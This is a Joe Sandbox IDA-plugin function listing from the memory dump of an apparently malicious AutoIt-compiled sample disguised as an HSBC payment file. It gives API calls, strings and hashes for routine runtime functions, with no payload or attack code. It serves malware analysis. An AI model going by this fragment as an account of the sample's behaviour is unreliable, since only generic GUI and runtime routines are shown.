DeleteObject.GDI32(?), ref: 007AAA94
SetTextColor.GDI32(?,?), ref: 007AAA9A
SetBkColor.GDI32(?,?), ref: 007AAAA4

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 2a3bd8fec7277fc59b7d5fee4b669dd3580da27cda6222d35cc2b3262c568be8
Instruction ID: 530bd69b1ab7f61e702373c3601f7be1bf1db1e9b7be71e8931e33ac1b796024
Opcode Fuzzy Hash: 2a3bd8fec7277fc59b7d5fee4b669dd3580da27cda6222d35cc2b3262c568be8
Instruction Fuzzy Hash: C8512F71900208FFDF119FA4DC48EAE7BB9EF89320F118625F911AB2A1D7799940DF94

Function 007A89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007A8AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A8AD2
CharNextW.USER32(0000014E), ref: 007A8B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007A8B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007A8B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A8B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007A8B86
SetWindowTextW.USER32(?,0000014E), ref: 007A8BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007A8BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 007A8C1F
_memset.LIBCMT ref: 007A8C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007A8C8D
_memset.LIBCMT ref: 007A8CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 007A8D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 007A8D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 007A8E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 007A8E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007A8E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007A8EB4
DrawMenuBar.USER32(?), ref: 007A8EC3
SetWindowTextW.USER32(?,0000014E), ref: 007A8EEB

Strings

0, xrefs: 007A8E55

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 1f0bf3b2c9a4019342f2285336df8ee0895f52689d78e195e8a337db5cd18caf
Instruction ID: bcd1ba777392a7a121c88f6397142ac269b59a205aa67db381292e86429452d4
Opcode Fuzzy Hash: 1f0bf3b2c9a4019342f2285336df8ee0895f52689d78e195e8a337db5cd18caf
Instruction Fuzzy Hash: EAE18270901219EFDF60DF60CC88EEE7B79EF8A710F148256F915AA191DB788980DF61

Function 007A488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007A49CA
GetDesktopWindow.USER32 ref: 007A49DF
GetWindowRect.USER32(00000000), ref: 007A49E6
GetWindowLongW.USER32(?,000000F0), ref: 007A4A48
DestroyWindow.USER32(?), ref: 007A4A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007A4A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007A4ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007A4AE1
SendMessageW.USER32(?,00000421,?,?), ref: 007A4AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007A4B09
IsWindowVisible.USER32(?), ref: 007A4B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007A4B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007A4B58
GetWindowRect.USER32(?,?), ref: 007A4B70
MonitorFromPoint.USER32(?,?,00000002), ref: 007A4B96
GetMonitorInfoW.USER32(00000000,?), ref: 007A4BB0
CopyRect.USER32(?,?), ref: 007A4BC7
SendMessageW.USER32(?,00000412,00000000), ref: 007A4C32

Strings

0, xrefs: 007A4975
tooltips_class32, xrefs: 007A4A96
(, xrefs: 007A4BA3

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 6164319d05cfe4d9901b62531ebab18066e42c3b069ab620e9bc26171c2be098
Instruction ID: d3e7a1351c6a460ee97267a1bf8d4dd2346d64751e685b63e1e887bd40934e51
Opcode Fuzzy Hash: 6164319d05cfe4d9901b62531ebab18066e42c3b069ab620e9bc26171c2be098
Instruction Fuzzy Hash: 4BB18B71604350EFDB04DF64D848B6ABBE4BFC5310F048A1CF5999B2A1D7B9E805CB95

Function 0078449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 007844AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007844D2
_wcscpy.LIBCMT ref: 00784500
_wcscmp.LIBCMT ref: 0078450B
_wcscat.LIBCMT ref: 00784521
_wcsstr.LIBCMT ref: 0078452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00784548
_wcscat.LIBCMT ref: 00784591
_wcscat.LIBCMT ref: 00784598
_wcsncpy.LIBCMT ref: 007845C3

Strings

04090000, xrefs: 0078457E
StringFileInfo\, xrefs: 0078451B
%u.%u.%u.%u, xrefs: 00784626
DefaultLangCodepage, xrefs: 007845AB
\VarFileInfo\Translation, xrefs: 00784540

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 287037749468361d624dd6542f25ea756b41ed225cfd7c7a46d2de0d87f4ccb0
Instruction ID: 1f6c9ff60e29eba177f6d430b5379a97fd4b1ba658027cc93a6a880c4f164db9
Opcode Fuzzy Hash: 287037749468361d624dd6542f25ea756b41ed225cfd7c7a46d2de0d87f4ccb0
Instruction Fuzzy Hash: 2041F871A40211BBDB10BAB58C0BEBF777CDF42710F44416AF905E6183EB7C9A1197A9

Function 007227D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007228BC
GetSystemMetrics.USER32(00000007), ref: 007228C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007228EF
GetSystemMetrics.USER32(00000008), ref: 007228F7
GetSystemMetrics.USER32(00000004), ref: 0072291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00722939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00722949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0072297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00722990
GetClientRect.USER32(00000000,000000FF), ref: 007229AE
GetStockObject.GDI32(00000011), ref: 007229CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 007229D5

Part of subcall function 00722344: GetCursorPos.USER32(?), ref: 00722357
Part of subcall function 00722344: ScreenToClient.USER32(007E57B0,?), ref: 00722374
Part of subcall function 00722344: GetAsyncKeyState.USER32(00000001), ref: 00722399
Part of subcall function 00722344: GetAsyncKeyState.USER32(00000002), ref: 007223A7

SetTimer.USER32(00000000,00000000,00000028,00721256), ref: 007229FC

Strings

AutoIt v3 GUI, xrefs: 00722974

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: cd684950f4e8d83b9cb98618cd704257f9b12fc8490aa5ea7f2559997bc403ef
Instruction ID: 97ec613145e5399fb6dfdc99fef6b9e892daabda7e9d78c28f7fde32b349f175
Opcode Fuzzy Hash: cd684950f4e8d83b9cb98618cd704257f9b12fc8490aa5ea7f2559997bc403ef
Instruction Fuzzy Hash: F2B18F71A0021AEFDB14DFA8DC85BED7BB4FB48315F108229FA15A7290DB78D851CB54

Function 0077A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0077A47A
__swprintf.LIBCMT ref: 0077A51B
_wcscmp.LIBCMT ref: 0077A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0077A583
_wcscmp.LIBCMT ref: 0077A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0077A5F6
GetDlgCtrlID.USER32(?), ref: 0077A648
GetWindowRect.USER32(?,?), ref: 0077A67E
GetParent.USER32(?), ref: 0077A69C
ScreenToClient.USER32(00000000), ref: 0077A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0077A71D
_wcscmp.LIBCMT ref: 0077A731
GetWindowTextW.USER32(?,?,00000400), ref: 0077A757
_wcscmp.LIBCMT ref: 0077A76B

Part of subcall function 0074362C: _iswctype.LIBCMT ref: 00743634

Strings

%s%u, xrefs: 0077A515

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 8fe0e2c477081240c8ba75f5a7a2503335bad37083fc867206eb5e59e62b1939
Instruction ID: bf0e046655a89b500ca31740edb1ebf43c32f5010329ca794f1346a64bf73a68
Opcode Fuzzy Hash: 8fe0e2c477081240c8ba75f5a7a2503335bad37083fc867206eb5e59e62b1939
Instruction Fuzzy Hash: 3CA19071204206FBEB18DF64C888BAEB7A8FF84395F108529F99DD2150D738E955CB92

Function 0077AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0077AF18
_wcscmp.LIBCMT ref: 0077AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0077AF51
CharUpperBuffW.USER32(?,00000000), ref: 0077AF6E
_wcscmp.LIBCMT ref: 0077AF8C
_wcsstr.LIBCMT ref: 0077AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0077AFD5
_wcscmp.LIBCMT ref: 0077AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0077B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 0077B055
_wcscmp.LIBCMT ref: 0077B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0077B08D
GetWindowRect.USER32(00000004,?), ref: 0077B0F6

Strings

ThumbnailClass, xrefs: 0077AFE0, 0077B060
@, xrefs: 0077AEF9

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: cc63a811ef549baf7cc280d4e470a31cca0960740a6e7626a6e5dc2e18e0563e
Instruction ID: 4c45aa07f57c4c3e3536cc16b413316d7501074e7c2f2d16622f1db7c8b3b463
Opcode Fuzzy Hash: cc63a811ef549baf7cc280d4e470a31cca0960740a6e7626a6e5dc2e18e0563e
Instruction Fuzzy Hash: 72819171108309ABEF05DF14C885FAA77E8EF84394F14C56AFD898A096DB38DD45CB61

Function 007AC5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623

DragQueryPoint.SHELL32(?,?), ref: 007AC627

Part of subcall function 007AAB37: ClientToScreen.USER32(?,?), ref: 007AAB60
Part of subcall function 007AAB37: GetWindowRect.USER32(?,?), ref: 007AABD6
Part of subcall function 007AAB37: PtInRect.USER32(?,?,007AC014), ref: 007AABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 007AC690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007AC69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007AC6BE
_wcscat.LIBCMT ref: 007AC6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 007AC705
SendMessageW.USER32(?,000000B0,?,?), ref: 007AC71E
SendMessageW.USER32(?,000000B1,?,?), ref: 007AC735
SendMessageW.USER32(?,000000B1,?,?), ref: 007AC757
DragFinish.SHELL32(?), ref: 007AC75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007AC851

Strings

@GUI_DRAGFILE, xrefs: 007AC800
@GUI_DROPID, xrefs: 007AC77E
@GUI_DRAGID, xrefs: 007AC7C9
pb~, xrefs: 007AC79B

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb~
API String ID: 169749273-781585954
Opcode ID: 239bcfec1ce9d5f81bec01e903672fa85d53661fc33fa230ded142c56a115617
Instruction ID: 12a800ec60491e177c4dde03144e0ca816f1aae6c88fe66ddd75b4f77abeb087
Opcode Fuzzy Hash: 239bcfec1ce9d5f81bec01e903672fa85d53661fc33fa230ded142c56a115617
Instruction Fuzzy Hash: 9F617C71108340EFC705EF64DC89D9BBBE8EFC9310F04492EF595962A1DB38A949CB92

Function 0077ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0077AC33

Strings

[ALL, xrefs: 0077ACD9
ACTIVE, xrefs: 0077AC0E
[ACTIVE, xrefs: 0077AC20
LAST, xrefs: 0077ABF8
ALL, xrefs: 0077ACC7
REGEXP=, xrefs: 0077AC48
[HANDLE:, xrefs: 0077AC3F
HANDLE=, xrefs: 0077AC2C
[LAST, xrefs: 0077ACE0
[REGEXPTITLE:, xrefs: 0077AC5B
[CLASS:, xrefs: 0077AC83
CLASSNAME=, xrefs: 0077AC70

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: f5b7d1056fe1083900e2374b1a0932d5a092eb3bcfb598a7031fcc74aa38810d
Instruction ID: b92be729e7568a3faa2096c577bd914e903ac62e77e7f83003f11ec8353c630d
Opcode Fuzzy Hash: f5b7d1056fe1083900e2374b1a0932d5a092eb3bcfb598a7031fcc74aa38810d
Instruction Fuzzy Hash: 163124B0648215FAEA19EA64EE0BEAE73749F50750F60802AF449711D1FF2D6F04C662

Function 00794FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00795013
LoadCursorW.USER32(00000000,00007F00), ref: 0079501E
LoadCursorW.USER32(00000000,00007F03), ref: 00795029
LoadCursorW.USER32(00000000,00007F8B), ref: 00795034
LoadCursorW.USER32(00000000,00007F01), ref: 0079503F
LoadCursorW.USER32(00000000,00007F81), ref: 0079504A
LoadCursorW.USER32(00000000,00007F88), ref: 00795055
LoadCursorW.USER32(00000000,00007F80), ref: 00795060
LoadCursorW.USER32(00000000,00007F86), ref: 0079506B
LoadCursorW.USER32(00000000,00007F83), ref: 00795076
LoadCursorW.USER32(00000000,00007F85), ref: 00795081
LoadCursorW.USER32(00000000,00007F82), ref: 0079508C
LoadCursorW.USER32(00000000,00007F84), ref: 00795097
LoadCursorW.USER32(00000000,00007F04), ref: 007950A2
LoadCursorW.USER32(00000000,00007F02), ref: 007950AD
LoadCursorW.USER32(00000000,00007F89), ref: 007950B8
GetCursorInfo.USER32(?), ref: 007950C8

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 999fca663521458fcdbdc8a1ba42c65d5223fc9e15ed2088b3a8c09bb0254ba1
Instruction ID: fb5f152190acb833a520054f73b61f310704b89b77a445dec4cb24f1e7eaa232
Opcode Fuzzy Hash: 999fca663521458fcdbdc8a1ba42c65d5223fc9e15ed2088b3a8c09bb0254ba1
Instruction Fuzzy Hash: 7631F2B1D4832DAADF109FB69C8996EBFE8FF04750F50452AE50DE7280DA7CA5008F91

Function 007AA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007AA259
DestroyWindow.USER32(?,?), ref: 007AA2D3

Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007AA34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007AA36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007AA382
DestroyWindow.USER32(00000000), ref: 007AA3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00720000,00000000), ref: 007AA3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007AA3F4
GetDesktopWindow.USER32 ref: 007AA40D
GetWindowRect.USER32(00000000), ref: 007AA414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007AA42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007AA444

Part of subcall function 007225DB: GetWindowLongW.USER32(?,000000EB), ref: 007225EC

Strings

tooltips_class32, xrefs: 007AA346, 007AA3D4
0, xrefs: 007AA26F

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 84acfac6053991f4b3ed73949503ca7e389ee0654ab07f837b751eb8339a5267
Instruction ID: f2bbf96142c8f081a5e2ce28c892ef66ac4110136d245bd515f45d90b27b12c4
Opcode Fuzzy Hash: 84acfac6053991f4b3ed73949503ca7e389ee0654ab07f837b751eb8339a5267
Instruction Fuzzy Hash: DC719A71140245AFDB25DF28CC49F6A7BE5FBCA304F04862DF9858B2A0D778E902CB56

Function 007A4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007A4424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007A446F

Strings

EXISTS, xrefs: 007A44D8
SELECT, xrefs: 007A4620
GETTOTALCOUNT, xrefs: 007A4456
EXPAND, xrefs: 007A4521
GETITEMCOUNT, xrefs: 007A4551
GETTEXT, xrefs: 007A45C2
GETSELECTED, xrefs: 007A457F
COLLAPSE, xrefs: 007A44B5
UNCHECK, xrefs: 007A464B
CHECK, xrefs: 007A448F
ISCHECKED, xrefs: 007A45F2

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 4ad848130150c92541aee4006fc47df3c9ba4b71986a5a58819875216a06a5e1
Instruction ID: ceaaccd0184ec4596d79c726674019bb71a94e198d5a02f3f6c37f7d7e56ff55
Opcode Fuzzy Hash: 4ad848130150c92541aee4006fc47df3c9ba4b71986a5a58819875216a06a5e1
Instruction Fuzzy Hash: CF916B71204711DFCB04EF20C855A6EB7E1AFD6350F088969F9965B3A2CB79ED09CB81

Function 007AB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007AB8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007A91C2), ref: 007AB910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007AB949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007AB98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007AB9C3
FreeLibrary.KERNEL32(?), ref: 007AB9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007AB9DF
DestroyIcon.USER32(?,?,?,?,?,007A91C2), ref: 007AB9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007ABA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007ABA17

